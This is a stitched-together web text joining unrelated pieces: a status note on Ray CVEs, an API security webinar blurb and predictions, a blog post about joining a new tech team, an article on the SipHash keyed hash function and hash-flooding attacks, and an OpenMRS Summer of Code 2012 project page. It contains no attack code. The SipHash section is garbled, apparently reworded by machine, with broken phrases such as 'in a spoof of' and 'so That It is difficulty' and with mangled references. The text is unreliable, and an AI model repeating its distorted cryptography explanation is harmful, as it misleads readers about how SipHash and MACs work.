- CDA-based Clinical Patient Summary Import and Export This project is to support OpenMRS’ ability to generate and exchange patient clinical summaries using the Clinical Document Architecture (CDA) model, an xml-based HL7 version 3 standard for clinical documents.
- Database Synchronization with SymmetricDS The proposed project enables common view of all data in implementations, where multiple OpenMRS instances on different nodes use multiple databases. Each OpenMRS instance with its database can be easily managed. But once multiple databases need to share data to show a common view to all instances, synchronization of data needs to be done. SymmetricDS is a smart, opensource solution to address relational database synchronization bi-directionally, even in resource poor implementation environments.
- Dynamic List Entry Tags and Widgets This specific project entails implementing a set of tags for HTML Form Entry to allow form designers to have widgets that allow the input of dynamic lists, where clinicians can add and remove items for fields on a patients form. This project will require designing and implementing the HTML tags and backend to create these dyanmic list widgets, and creating some real life example forms that use the new functionality.
- Filtering Forms on Dashboard " Filtering Forms on Dashboard " project looks in point of user who is looking for patient details. There can be cases where the unnecessary forms are seen on patient dashboard , this can be acceptable till forms a limited but when the forms count increase to ten's and more starts challenge to user. So to filter these forms is the main aim of this project. Example:- A user who has selected a 40 year-old patient, they don't want to be bothered with pediatric forms designed for children in the list that are obviously inappropriate for that patient.
- HTML Form Entry Module Enhancements The HTML Form Entry module allows anyone with basic HTML skills and a knowledge of the OpenMRS system to create forms to enter and edit patient data within the system. The main feature of the HTML module is facilitating user with the ability to write form using standard HTML tags along with with a set of special tags that reference different aspects of the OpenMRS data model. Therefore the module makes it easy for the user to write user defined set of HTML forms according to their wish. This project is intended on improving the features support of the current HTML Form Entry module with creating several new tags as well as improving some existing tags for better performance too. In addition to that it is also concerned on implementing extra features requested by the community according to the remaining time duration of the project.
- Human Resource Module This project aims at developing tests around existing HR module, making it more suitable for distributed development, and developing it further to add remaining functionality.
- Implementing Novel Features to Improving De-duplication User Experience Patient matching module has been developed for OpenMRS to identify and merge the duplication data of the patients. As a student, I will be improving the usability of module by improving the validation, suggestions to avoid potential errors, and adding advanced features to the module's web interface.
- In-page Localization In-page l10n tool will allow making translations of OpenMRS right when viewing web page. For now, it’s annoying for developers to make number of steps to provide even a default translation of a text message within OpenMRS. In addition, actual translators also need to complete a lot of actions to provide further translation. Obviously, it makes translations process inconvenient and not efficient. So, the main goal of this project is to implement and integrate pretty handy tool for in-page l10n.
- Logging Errors to the Database The more application the more potential errors in it can be. That's why any big project has many tests. The role of testing is to determine the presence and location of errors remaining in a well-designed program. But tests still can not anticipate all possible errors and bugs in the application. So developers began to use logging. Log messages that tell what the application is doing can help locate any defects that are present is application. Without logging in an application, maintenance can become an intricate problem for the developers. But even with a system of logging in the application programmer is still hard to keep track of all the errors, because the application can use several different organizations. And end-users have to somehow report to the administrator of application about error, and he in turn to developers. The administrator must to find detail information about error in the server logs and send this information to the developers. This is a laborious and lengthy work. So the developers of OpenMRS solved this problem by using default error handler. They provide information about error to users in the default error handler so that they can provide a specific error log id along with their bug report. So end-users can report bugs directly to the developers. Currently user can press button "Report Problem" to report about error and afret then create a new ticket on bugtracker. But it is still far from ideal mechanism for fixing bugs. So, the main goal of my project is to create tools to improve and systematize the error detection mechanism.
- Merge Concept Module Merge concept tool for altering concepts through the entire database: As the OCC and MCL are improving to manage concepts from various sources, it is time for a super admininstrative tool for changing concept_ids through-out the database. The application would search obs, drug, program/ workflow/ state, all varieties of forms, etc. for tables which use the concept_id (including answer_concept/ discontinued_reason/ etc) and replace with a different concept. This would be helpful when cleaning duplicate concepts and merging with other concept dictionaries.
- Metadata Sharing Server Project The goal of this project is to create a central repository of metadata where OpenMRS installations can publish their metadata. The Metadata Sharing Server will store metadata from different OpenMRS servers and expose them to clients. Clients will be able to search through metadata packages and choose some to import and subscribe. In this model the Metadata Sharing Server will act as a central subscription server for clients.
- Patient Dashboard Tabs Loaded via AJAX The world we are living in is overwhelmed by the spread of numerous diseases. They can be hard to cure and some might even be life threatening. This is even a greater problem in developing countries where the governments do not have money in abundance to invest in state-of-the-art health care management systems. In this context, OpenMRS can be a life saver for the poor countries that rely on stone aged systems to manage information in their hospital systems. In this proposal, I will be presenting how I plan on making the patient dashboard AJAX enabled so that it loads quickly and easily.
- Personal Health Record Module Enhancement This module is provides patients with personal dashboard where the patient can keep track of his recovery and exchange information with social group. Enhancements to this module includes features like printing of data, customizing data according to patients, clinical decisions for side effects tab etc...
- Re-implement BIRT module on top of reporting module OpenMRS BIRT module produces clinical patient summaries, facility, indicator reports in different formats. But currently it lacks support for latest BIRT Runtime releases, data generated by the core reporting module and RESTful web services and ultimately not well integrated with the recent OpenMRS Reporting module.
- Upload and View or Download Image or File in HTMLForm It is important to load images or other files (such as Excel spreadsheets generated during EBRT - External Beam radiation Therapy or Brachytherapy based Oncology treatments) with patients clinical record. We are proposing this project so that, the implementers while developing the HTML Forms using the HTMLForm entry module can provide a file upload button to the data entry user. Consequently, when the user load a file/image while doing data entry for an encounter, those files should be stored in the server so that they are available to be viewed/downloaded by other users.
|
OPCFW_CODE
|
Richard A. O'Keefe
ok at cs.otago.ac.nz
Thu Aug 22 05:32:35 UTC 2002
"David Griswold" <David.Griswold at acm.org> wrote:
You made a blanket assertion, that methods should not ever return
garbage silently, and that it is their responsibility to make sure that
such results are prevented.
Procedures, functions, methods or whatever should be so designed that they
do not return garbage silently.
There. I did it again.
Remember, I am not talking about generalities. I am talking about specific
methods in a specific library.
I continue to affirm that if a call to a method
MEETS THE STATED PRECONDITIONS
so that the caller is innocent, and yet the method
DOES NOT ACHIEVE ITS STATED POSTCONDITION
then the method has an obligation to yell about it and not silently
We aren't talking about methods that are *documented* not to work in
a certain special case. We are talking about methods whose name and
comments lead the reader to believe that they _will_ work in that
case, but they don't.
We are not even talking about semantically odd cases.
There is nothing odd about X \ X or X U X when X is a mathematical set;
and if your operation is X := X \ Y, this is perfectly well defined when
X = Y.
I also affirm that it is a good thing if an expensive method (remember,
I am dealing in specifics here) checks such parts of its precondition as
are cheap (in context).
I entirely agree that not having such aliasing problems would be
fantastic; but all the languages you listed are non-imperative, and
Smalltalk is imperative.
No, I have also mentioned AWK, which is entirely imperative.
I love the fact that this kind of problem
doesn't happen in non-imperative languages, but that doesn't make
Smalltalk one, and it doesn't make it possible to make Smalltalk act
that way in general, which is what your blanket statement requires.
No, I don't have a blanket statement. I have a statement IN A PARTICULAR
CONTEXT, which is methods called with arguments valid according to the
precondition but not achieving their postcondition.
All the things you want in terms of documentation, and detection of
interface violations are good, but we disagree profoundly about where
such checks belong.
They belong in the cheapest most maintainable place.
That *usually* means in the method itself, not in its callers.
I think that they simply don't in general belong in
the main runtime code path, they belong in separate assertions or
pre/postconditions whose cost can be made zero in production.
But we are, or I am, explicitly *NOT* talking "in general".
I am talking about expensive (O(N)) operations and cheap (O(1)) checks.
I try not to be an ideological purist, and I don't see a great practical
difference between "cost is zero" and "cumulative cost is so small it is
extremely hard to detect."
That's one reason why I prefer the "patch #removeAll: and #addAll:" solution
to the "fix #do:" solution.
We also disagree profoundly about whether (x removeAll: x) makes sense
*as the library is written*.
As the library is *implemented*, no it does not make sense.
That's because the library is ***buggy***.
I don't think the question "makes sense as the library is written" is a
The point is that the operation
MAKES SENSE even when y is x, and the operation
MAKES SENSE even why y is x, and these operations CAN be implemented easily
in Smalltalk, and the method comments lead you to believe that these are
the operations you have been provided with.
I think it just doesn't, and I explained
why, so this input is not part of the expected domain of the method.
Your reason boils down to "if the implementor uses dumb code, it won't work;
always expect the implementor to use dumb code." That isn't practical
advice. It is the job of a library *designer* to provide a clean interface
with as few surprises as practically possible. It is the job of a library
*implementor* to implement that interface; and where it turns out to be
impractical, the documentation should reflect the change.
I've *been* a library designer. I've *been* a library implementor.
I know that it is possible to avoid this kind of bug.
You disagree- 'nuf said. However, I think that it is a common bug that
almost everyone makes at some point, and so catching it would be a "good
thing". I think the reason that passing the receiver as an argument is
not supported right now is that most often, that's not the most
efficient way to do it, so it is not necesarily desirable to encourage
emptying a collection this way. It is almost always more efficient and
just as convenient, to just create a new collection. Extending the
library to support using (x removeAll: x) to empty a collection in-place
sounds potentially reasonable to me if its importance could be
justified- but I do not believe the method as currently written is
broken, and that is our real disagreement.
The implementation of the method does not agree with ANY of the documentation
I could find for it.
If that's not a good enough approximation of "broken", what the heck WOULD be?
More information about the Squeak-dev
|
OPCFW_CODE
|
ManageEngine has been recognized as a Customers' Choice in the 2023 Gartner Peer Insights™ Voice of the Customer for Application Performance Monitoring and Observability report. Learn more✕
Applications Manager performs Python monitoring by collecting various performance metrics and converting them into useful insights that can be used by IT administrative teams to make enhancements and optimizations. Being an interpreted language, it becomes critical to have round-the-clock visibility into your Python application platform to prevent performance bottlenecks and instances of application crash.
Applications Manager's Python monitoring tool keeps a close watch on every component of your application, allowing DevOps teams to immediately response to performance issues preemptively before end-users get affected. This becomes especially critical when dealing with CPU-intensive workloads where it is possible to be unaware of performance degradation that occurs behind closed doors. This makes it essential to employ a Python application performance monitor like Applications Manager which can instantly throw an alert to the respective teams and perform automated actions accelerate the troubleshooting process.
Applications Manager features a visual performance dashboard that gives an overview of all the critical metrics that are necessary to understand the exact point where an issue originates from. It also gives the Apdex Score of your Python applications which can help understand the satisfaction level of an end-user. In addition, it breaks down the response time of application components and isolate the exact point where severe latency issues occur. At a glance, IT teams can get a list of the slowest transactions and traces that require attention without having to go through an entire heap of code.
Applications Manager offers complete visibility into your Python application stack by monitoring all the database operations and the effects that their response rates would have on the transactions traces. It breaks down each database operation to give the response time, request rate, error percentage, and throughput within a single console.
Our Python application monitor also lists out the slowest traces involved with the database operation, making it easier to identify the one that takes too long to execute and optimize them for better Python application performance.
Through Applications Manager, it becomes possible to sort out transactions based on different performance metrics to isolate the ones that are performing poorly and require immediate attention. Using performance graphs, IT administrators can have better visibility into each component of their Python application and identify fluctuations that could potentially translate into performance bottlenecks. Once the exact application component has been identified, our Python monitoring software can be used to drill down into each component or trace for further insights.
Some of the metrics that help achieve visibility into transactions include response time, error codes, exceptions, throughput, and more.
Applications Manager supports distributed tracing that tracks the entire path that a request ventures through to execute an application operation. This capability grants granular visibility into your application's code path to identify the error and latency of your Python services. By simply applying a toggle, Applications Manager highlights the slowest traces that are involved with the transaction, revealing the origin point of the performance bottleneck. Furthermore,it also tracks the response time of each SQL statement to help understand the statement that takes too long to execute its task.
Within the console of our Python monitoring solution, there is a dedicated Exceptions panel with a detailed breakdown of the all the parameters related to errors and exceptions. In addition to tracking the error codes of your Python application, Applications Manager also alerts you whenever the count of each code exceeds a certain limit. It monitors the different exception error types that your Python application would be prone to. It also gives a split up of the exceptions and error for each transaction that allows quicker debugging without affecting the performance of your Python application.
Featuring a customizable service map, Applications Manager makes it possible to group all the dependencies of your Python application and draw a correlation across them. As most business-critical applications deal with innumerable amount of dependent services, the mapping functionality gives more clarity into the exact component that has become unavailable. With the aid of this functionality, one can easily trace the dependent components that are affected by the unavailable Python application service without having to contact individual IT administrative teams manually.
ManageEngine Applications Managers serves a one-stop solution for all your Python application monitoring needs with the granular visibility into tons of critical performance metrics. To explore all the features of our Python monitor, try out a 30-day free trial of Applications Manager now!
It allows us to track crucial metrics such as response times, resource utilization, error rates, and transaction performance. The real-time monitoring alerts promptly notify us of any issues or anomalies, enabling us to take immediate action.
Reviewer Role: Research and Development
|
OPCFW_CODE
|
The LXQt team is very proud to announce the release of LXQt 1.0.0, the Lightweight Qt Desktop Environment.
- LXQt 1.0.0 depends on Qt 5.15, which is the last LTS version of Qt5.
- Apart from bug fixes and workarounds, several functionalities are added to LXQt’s file manager, like handling of emblems, new options in LXQt file dialog, an option to make desktop items sticky by default, recursive customization of folders, enhancements to smooth scrolling with mouse wheel, etc.
- LXQt’s image viewer has received several fixes and new options.
- The do-not-disturb mode is added to LXQt Desktop Notifications.
- LXQt Panel has a new plugin, called “Custom Command”, which does what its name says.
- Saving and loading of Qt palettes are possible in LXQt Appearance Configuration.
- Idleness checks can be paused from the tray icon of LXQt Power Manager.
- Names of dragged and dropped files are quoted in QTerminal.
- Two LXQt themes are added and problems in the existing themes are fixed.
- As always, translations have received many updates.
- And other changes that can be found in change logs of LXQt components.
LibFM-Qt / PCManFM-Qt
- Emblems can be added/removed in the File Properties dialog.
- The recursive customization of folders is made possible.
- An option is added for making desktop items sticky by default.
- Mount, unmount and eject actions are added to file context menu under
- A freeze is avoided on mounting encrypted volumes by using a workaround (for a problem in GLib, Qt or both).
- Workaround for a bug in
GFileMonitorregarding file monitoring inside folder symlinks.
- Prevented closing of the file operation dialog on closing the main window.
- Ensured a correct selection order with Shift+mouse in icon view.
- Prevented self-overwriting in file prompt dialog.
- Fixed Cyrillic case-insensitive regex search.
- Enhancements and fixes to smooth wheel scrolling. Now, compact and list modes also have it by default (but it can be disabled for them).
- Added options to LXQt file dialog for showing hidden files and disabling smooth scrolling in list and compact modes. Also, the hidden columns of LXQt file dialog in the list mode are remembered.
- “Custom Command” plugin is added. It is a flexible plugin that can be used in various ways.
- Items of Main Menu’s search results have context menus and can be dragged and dropped.
- Better icon handling in Status Notifier.
- Fixed the keypad navigation in Main Menu.
QTerminal / QTermWidget
- Names of dragged and dropped files are quoted.
- Trim shell strings.
- Respect the preset splitting on opening new window or double clicking tab-bar.
- Fixed a crash under (Plasma) Wayland on opening tab and splitting.
- Added an option for keeping drop-down window open.
- Added a workaround for wrong menu positions under Wayland.
LXQt Desktop Notifications
The do-not-disturb mode is added.
LXQt Power Management
Idleness checks can be paused from the tray icon for 30 minutes to 4 hours.
- Options are added for hiding/showing main toolbar and/or menubar, using Trash, changing Thumbnail dimensions, and changing the position of thumbnails dock.
- Fixed bugs in image fitting, flipping and rotation.
- Fixed wheel scrolling on image with touchpad.
- Allowed direct image renaming (with shortcut).
- Remember EXIF dock width.
- Added command-line option for starting in fullscreen.
- An option is added for disabling image smoothing on zooming.
- “Other Settings” is added to Configuration Center.
- Saving and loading of Qt palettes are supported by Appearance Configuration.
- Added support for default terminal.
- Considered Qt’s fallback search paths when finding icons (for coders).
LXQt Global Keys
Filtering is added for finding shortcuts easily.
Password prompt is shown for archives with encrypted lists.
Please see the release page of each LXQt component for its release note.
Notes For Packagers
Please follow the build order.
|
OPCFW_CODE
|
Summary: OK – I got this working – but you may not like the solution.
So it still bugs me that WCF won’t directly support partial trust in V1. This means that it is much harder for partially trusted ASP.NET applications to host or use WCF services (same applies of course to all WCF clients like ClickOnce applications).
Today I decided to give it a go and find out how hard it really is. Here is what happened.
If you want to call something from partial trust which does not allow partially trusted callers, you have to wrap it in/assert full trust (keep that in mind – we will need this later on) – or as my good friend Marcus would say: “the devil is in the detail” :)
OK – so after you have a working client/service in full trust, these are the necessary steps:
- Move the WCF proxy to a separate assembly.
- Give that assembly a strong name.
- To be able to call the proxy from partial trust, you have to add a [assembly: AllowPartiallyTrustedCallers] attribute to the proxy assembly.
- Assert full trust in the proxy. The easiest way to do this is by adding an attribute on top of the proxy class.
public class Proxy
Create a new policy file. It is recommended to use the medium trust policy as a starting point. You can find the policy files in the framework configuration directory. The medium trust policy is called ‘web_mediumtrust.config’
- You have to add a new code group for your proxy assembly to the policy file granting full trust. This code group should go directly under the ‘AllCode’ grop. Use a StrongNameMembershipCondition to identify the proxy (you get strong names in the right format from secutil.exe with the -hex and -s option).
Add a new trust level to global web.config that points to your policy file
<trustLevel name=“WCF“ policyFile=“web_WCF.config“ />
Apply this trust level to your application (either in your local web.config or via a location element in an upstream config)
<trust level=“WCF“ />
So far so good – the proxy is separated from the application and has full trust. But when you try running the application now, you will get an ugly ConfigurationErrorException saying the system.serviceModel/client configuration section cannot be accessed because the assembly does not allow partially trusted callers..WTF?!
After following an adventurous code path through the .NET configuration system and seeing variables named like isTrusted and isLocationTrusted – I suddenly knew what is going on.
I remember vaguely that ASP.NET has this concept of trusted configuration locations – e.g. a configuration handler that is registered in machine.config gets full trust even if the application using that section is running in partial trust. This on the other hand means that if a configuration handler is demanding full trust – and thats what System.ServiceModel.dll is essentially doing – the configuration section can’t be in a partially trusted location.
I then tried to move the <system.serviceModel> configuration section to a location element in global web.config – and (drum roll) – it worked…
<location path=“Default Web Site/PartialTrustWcfClient“>
By moving the config section we basically “wrapped” it in full trust. The only other option I see is wrapping the configuration section classes instead. This is quite some work and you would loose intellisense.
OK – so this just shows that partial trust is an un-supported and un-tested scenario in WCF V1. But it works and is – if you have to use WCF – better than running ASP.NET in full trust.
You can find the artifacts here.
|
OPCFW_CODE
|
Proposal: Inlay Hints with minimal parameters count
Suggestion
🔍 Search Terms
Inlay Hints, LSP, VS Code integration
✅ Viability Checklist
My suggestion meets these guidelines:
[x] This wouldn't be a breaking change in existing TypeScript/JavaScript code
[x] This wouldn't change the runtime behavior of existing JavaScript code
[x] This could be implemented without emitting different JS based on the types of the expressions
[x] This isn't a runtime feature (e.g. library functionality, non-ECMAScript syntax with JavaScript output, new syntax sugar for JS, etc.)
[x] This feature would agree with the rest of TypeScript's Design Goals.
📃 Motivating Example
From https://github.com/microsoft/vscode/issues/147875
With javascript.inlayHints.parameterNames.enabled: 'all', we got
parseInt(/* str: */ '123', /* radix: */ 8)
While in many cases, we only use one parameter when calling a function, for example
parseInt(/* str: */ '123')
console.log(/* message: */ foo)
// Vue's Composition API
const state = ref(/* value: */ 1)
array
.filter(/* predicate: */ Boolean)
.map(/* callbackFn: */ i => i.value)
In those cases, the contexts are less ambitious and the inlay hints become a bit redundant and even verbose.
⭐ Suggestion
Thus I am proposing to introduce a new setting to configure the minimal parameters count required for the inlay hints to enable in each function call.
Able to have this setting fields in VS Code:
"typescript.inlayHints.parameterNames.minCount": 2 /* default: 0 */
To hide the inlay hints when calling functions with a single argument.
Thus we could expose an additional preference entry for
interface InlayHintsOptions extends UserPreferences {
includeInlayParameterNameHintsMinCount: 2
}
I had the implementation ready at https://github.com/antfu/TypeScript/commit/395477592183cf555ab5cea6b0eaa041ae2a757b . Could send a PR if the team agrees on this change.
💻 Use Cases
To provide a cleaner code reading experience for common functions while having the ability to have inlay hints for complex functions.
While I understand the case for 1 parameter, the customizable minimum seems like worthless bloat - I can’t think of why someone would want to disable parameter hints across the board based on any minimum number of parameters other than 1, since the hints tell you not only what the parameters do, but also which one goes where.
We discussed this today, and there was some interest in exploring an alternative: allowing signatures to specify that a particular parameter name should or should not display a hint, perhaps with a JSDoc signal. It was observed that there are trivial counterexamples to anything we could propose that uses solely arity or argument position:
parseInt('0'); // Adding radix argument does not make me want the first arg label
[].filter(/* predicate: */ somePredicate, /* thisArg: */ window); // Same here
Math.sin(/* radians: */ oopsDegrees); // Unary but I want the label?
Thanks for getting back! I think having JSDoc control is a nice thing to have. However, my concern is that this preference might a bit personal, and better to be able to change on the user side (even great for both). Consider that ppl with different levels of familiarity with the language or library, the help that inlay hints would vary.
For example, the predicate hint might not be useful for ppl already know it, but could help beginners to understand what .filter is supported to be for the first or second time. Leaving the control to the function authors (or type authors) solely might take time to make it up to date and might not be perfect for both worlds.
BTW I also made another proposal https://github.com/microsoft/vscode/issues/147877 , probably trying to reach a similar goal as your proposal. I originally thought they should be two features that accommodate each other to improve the verboseness. Was trying to get feedback on this before rasing the others.
Indeed my proposals are fairly rough, but I am very happy to see the team is interested in improving this! Happy to continue the discussions and iterate the ideas. Thanks :)
For what it’s worth I never saw inlay parameters as documentation - rather they’re a reading aid to make it easier to skim code. Familiarity with what the function does is assumed IMO (and already covered by intellisense); you just might not always remember which arg goes where.
you just might not always remember which arg goes where
I have no idea what you’re talking about
…which is why inlay hints are hidden when a variable is passed in matching the parameter name. :wink:
I like #48899 a lot more than using parameter count as a proxy of whether inlay hints may be helpful. I've seen plenty of functions that take a single argument whose purpose is not clear until you look up the argument's name
|
GITHUB_ARCHIVE
|
I would like to create an assignment for my students, in which they have to find new words for a given topic and enter them into a course’s glossary. In the past I have just had students add new entries into the glossary, however the grading for this method is very convoluted, has anyone devised a better way to achieve an assignment like this?
What makes the grading convoluted and how you would prefer it to be?
Currently my method is to have my students enter terms into the primary glossary, I then approve all the entries, and sort the entries by author. I then look for the number of entries each student has put inot the glossary and I look. I would like to be able to do this as an activity, so that the scores are contained in one place and can be transferred much easier.
So the grade would be based on quantity and quality?
Exactly, in the past I have tried to use the rating system for this, but it was a poor solution at best.
It will be possible with the dataform as soon as I finish the activity grading part. This would allow you to grade by entry or as a whole.
In our 2.1 site, we can chose to rate each entry and chose whether the grade book will take the average, maximum, minimum, count or sum of ratings. Would that be easier?
It wouldn't meet the requirement. The point is to assign a grade without having to rate each entry, and even without rating any entry. This is particularly important where the activity grade is not a simple aggregation of the entries' ratings. Consider, for instance, that each entry could be evaluated as Good but the overall would be Excellent, taking into account also number of constributions or some other factor. In such a case you can't get the overall from an aggregation, and rating Excellent a representative entry may give the wrong impression about the actual evaluation of the particular entry.
Just to illustrate how it could look like in the Dataform.
You can enter grade and comments in both the activity and entry levels. Which grade goes to the gradebook is set in the activity settings.
This is the solutiont that I am looking for both from a function standpoint and a pedagogy standpoint. I want the students not only to be able to complete a terminology type of assignment, but also use that assignment to build a functional glossary resource and ultimately to take it a step further and have them (the students) peer-review material for quality, for this I will end up using the rating system.
Very good. It should be included in the next release for testing and feedback and by that time (a week or so) there should also be some documentation how to set it up in a view.
My school is using 2.2....is this possible in 2.2?
Yes, it should work on 2.2.
Can you please direct me to instructions onhow to configure the assignment in this way? Thank you!
|
OPCFW_CODE
|
Maven Eclipse Plugin
So far, we worked with Maven CLI. In this chapter, we install Eclipse Maven Plugin and learn to manage Maven Project in Eclipse IDE.
Eclipse Maven Plugin, M2Eclipse or simply M2E, provides integration between Eclipse IDE and Maven. Among other things, it assists in the following aspects of Maven.
view contents of local and remote Maven repositories.
provides wizards to create single module project or multi module Maven Projects.
convert existing projects to Maven.
mange project POM through GUI Editor with features such as context assistance.
add and manage dependencies and plugins with search feature.
build projects with Maven Builds.
Install Maven Eclipse Plugin
Latest releases of Eclipse comes with M2Eclipse (M2E) plugin preinstalled. To check whether M2E plugin is already installed, go to Window → Preferences and if M2E plugin is installed then dropdown entry named Maven will be on the left panel of Preferences window.
In case no Maven in Preferences, then install it as follows. To install M2E, go to Help → Install New Software … and it displays the Available Softwares window. In Work with text box, enter M2E update site
http://download.eclipse.org/technology/m2e/releases and click Add and then in Add Repository window click OK. Then proceed with installation of plugin.
For earlier versions of Eclipse such as Juno, the appropriate version of M2E is 1.4.x. Toggle Show only the latest version of software check-box to list the earlier versions of M2E.
Maven Repository View
Before start using M2E, we need to check whether the plugin has properly indexed the local repository. This is essential to activate the M2E’s search features while adding the plugins or dependencies to the project.
To update the index, open Maven Repositories View with Windows → Show View → Others → Maven → Maven Repositories.
In the Maven Repositories View, expand Local Repositories and right click on Local Repository and from the context menu, select Rebuild Index. Once index is updated, we can browse the repository and view the artifacts and plugins stored there.
It is also desirable to rebuild index of Maven Central Repository which exists under the Global Repositories. However, it takes much longer than local repository and requires net connection.
Create Maven Project
M2E provides wizard to create Maven Project. We can use the wizard to create either a bare bone project (without source packages and files) or a project derived from Maven Archetypes.
Open Maven Project Wizard with File → New → Others → Maven → Maven Project.
The wizard opens Select project name and location window. The check-box Create a simple project allows either to create a bare bone project or project based on Maven Archetype. Leave it unchecked to select Maven Archetype in the next step. And also, leave the location to default and click Next.
Next in the Select an Archetype window, we can use filter field and get list of matching archetypes. To create a quickstart app, enter quick as Filter and from the shown list, select maven-archetype-quickstart and click next.
It opens Specify Archetype parameters window, where we enter the project Maven Coordinates and package name.
Finally click Finish to create the project based on quickstart archetype. The project structure is as shown in the screenshot.
Add Maven to Project
With M2E, we can add Maven build system to any existing project in Eclipse workspace.
To start with, modify the directory structure of the project as required by the Maven. In case, we wish to retain the existing directory structure then we have to add directory configuration elements to pom.xml as explained in the Manage Maven Directories, once M2E creates the pom.xml,
To enable Maven nature, right click on the project and in the context menu, select Configure → Convert To Maven Project. M2E Plugin enables the Maven nature and adds pom.xml to the project.
Likewise, we can use Maven → Disable Maven Nature from the project context menu to convert a Maven project to a regular project.
The next section, explains other features of M2E Plugin which comes handy to manage and build Maven Projects in Eclipse IDE.
|
OPCFW_CODE
|
>Find a Thinkpad T410 in great condition for $139 on ebay
>Pay $251 after international shipping and import taxes
Was it worth it, /g/?
Why you don't use Solaris yet?
The same reason I dont use zfs... dont want to get cucked by oracle's proprietary shit
Is this laptop effecient for video editing?
hp pavilion 17 g101au
What is your favorite Go(master race) feature?
Mine is easy concurrency
> go foo()
What phone does /g/ blindly recommend in the price range of 250-300 bucks?
I'm thinking of LG g3 or g4 but I'm completely clueless on the subject.
I have an LG G3.
ROM community is pretty solid, with numerous 6.0.1 builds out already.
The device does has a slight overheating problem, though this can be alleviated with a copper shim and some thermal paste.
The thin bezels make the 5.5" screen acceptable and not an overly large form factor.
How do I center the container and keep it dynamic it would be cool if you know how to vertically align as well.
Microserver G8 owners: I'm in a need of a RAID controller because the onboard b120i only supports 2xSata3 and 2xSata2, and I want 4xSata3.
I have ~$100 for this.
Is there a windows program that will instantly minimize everything, even if a game is insisting on staying on top, with a shortcut? I want to game at work and alt-tab or winkey+d sometimes won't work or is too slow.
Is there currently any way to build a desktop pc for 250€ that will run fallout on 20-30 fps?
Or should I just get an Xbone?
Hope this is bot a personal support question
Mobile app developers of /g/, how many downloads do your apps get?
So I've been contemplating replacing the OS on my iMac with Linux (Fedora or Mint) but I'm still unsure if I want to do this since I've been using OS X for about 4 years now.
What does /g/ think?
Oh and inb4
As Mac-user you already have potential knowledge how to use terminal and its commands, so your switch to a different OS is not so big as it is for Windows-users.
As stated earlier, dual booting is the way to go.
Since tripcodes are only alphanumeric 9 chars, we could theoretically just calculate all of them and store them online for quick lookup. This would get rid of tripfags once and for all.
Who with me?
What could make a Mid-2007 Macbook freeze up randomly? No kernel panics, no logs, just a basic hardware interrupt. I'm thinking bad RAM, because it's seemingly random, but I haven't opened the case yet. It definitely needs thermal paste reapplied, so it's getting opened tomorrow anyway, but what should I expect?
That's a really stupid fucking question that you insult the illustrious denizens of this board with. You should take it elsewhere, because we are not your fucking poo-in-the-loos.
Go fuck yourself. I've been in IT since you were in diapers, I'm trying to get you faggots talking about something other than riced up desktops and gentoo. /g/ really is the cancer of the fucking internet.
Anyone running KVM with pass through of gpu?
My mother board(Asus P6T) has a fucked up DMAR table so it doesn't work (seems all of asus boards screwed up VT-D). Thinking of its worth upgrading to something that does support it.
I'd want a Linux host, and then windows gets the GPU for gaming needs. Worth it? Experiences?
I'm autistic as fuck but I can't code for the life of me and it just bores me a lot of the time
this shit ain't fair, aren't I meant to at least get l33t skillz in exchange for social isolation?
I've tried on apperently quite basic sites like code academy - i don't think i'm that bad, but it just doesn't 'click' instantly, which I imagine it does for most of you --- considering most good coders seem to do it ALL day, and seem to have done it for fun, from a young age etc,
|
OPCFW_CODE
|
Before exploring Microsoft QuickLook, let me ask a question. Do you want to enjoy a Mac feature on your Windows 10? Certainly, you will have a positive nod because Apple macOS possesses many exclusive features. One of those features is Apple QuickLook that gives an instant preview of a file within the file explorer. Now the same feature can be enjoyed on Windows 10 with the Microsoft QuickLook app. After installing this app, hitting only the space bar will render you a quick preview. However, let’s explore it further.
Overview of Microsoft QuickLook
Microsoft has not yet brought file quick preview feature in its product as well as the operating system. However, it is now possible with the QuickLook app that is available on the Microsoft apps store. This app enables users to have an instant preview of files by just pressing the Space Bar. Moreover, this app was released on 18 July 2020 and was published by Paddy Xu. It is categorized among the free productivity apps of Windows 10.
Supported Keys other than the Space Bar
Well, as mentioned earlier that Microsoft QuickLook gives you a preview of a file when you hit the space bar. It is also a matter of fact that this app does not have many options that might allow us to customize it. However, it supports some other keys except the space bar those are the following.
- Spacebar: Preview and close preview
- Escape (Esc): Close preview
- Enter: Open in the default app and Closed Preview
- Ctrl + Mouse Wheel: Zoom images as well as documents
- Mouse Wheel: Volume up and down
It is also worth mentioning that GIF takes some more time while generating preview. While other apps respond instantly.
How to install Microsoft QuickLook?
The installation of this app is very easy. Either you can download it from Microsoft app store or form Microsoft site, click this link. Once you click this link, it will ask you to sign in your Microsoft account. The following is the procedure.
- Go to Microsoft Apps Store or click this link
- If you have not already signed in then sign in to your Microsoft Account
- Verify your credentials and account through a code received on your email address
- Once you have verified the account, it will show “You own this app”.
- Click “Install on my device” and the app will install on your device.
But, remember, your device should meet the essential requirements.
System requirements for QuickLook
The minimum requirement to install Microsoft QuickLook is the following.
- Operating System (OS) – Windows 10
- Architecture – x86, x64, ARM, ARM64
- Keyboard – Integrated Keyboard
- Mouse – Integrated Mouse
If you have these essential things in your system then you can install this app using the above-mentioned method.
MIcrosoft QuicLook app can enable you to have a quick and instant preview of a file within the file explorer. This feature was available in the Mac, however, now you experience it on Windows 10 as well for free. It fetches the preview of all files instantly but GIF takes a little more time. Stays tuned with us for more such news, and info, updates.
|
OPCFW_CODE
|
In our previous articles we have described how to install WordPress on localhost using MAMP and how to move live WordPress site to localhost. When you start building a site, it may also necessary to build a site on localhost and then move the content to a live server after everything works fine. Sometimes you may also do periodic testing and development on localhost site and then move the changes to the live server. At any case it makes a good sense to understand how to move WordPress localhost site to live server so that you can use your local copy to restore the content on emergency.
Summary: Move WordPress Localhost Site to Live Server
Below is the summary of steps involved in this process:
- Use FTP and upload all the localhost files to your live server’s root.
- Export local database using phpMyAdmin of local server.
- Create a new database on your live server using phpMyAdmin option.
- Import the local database tables to live database using phpMyAdmin option on live server.
- Replace all occurrences of localhost links to live site’s links.
- Verify and modify the database name and password in wp-config.php file.
- Login to your live WordPress admin dashboard and check the content.
Step 1 – Upload Localhost Files to Live Server
Launch your FTP client and upload the localhost files to a live server. Generally the content can be uploaded under the root “/public_html”. If you want to install WordPress on subdirectory then create the folder and then upload the content inside the folder.
If you want to install it on a subdomain then create a subdomain from your hosting account and then upload the files under that subdomain folder using FTP. Learn more on using FileZilla for FTP.
Note: If you have MAMP local installation on Mac then the content will be available under “Applications > MAMP > htdocs”.
Step 2 – Exporting Localhost Database
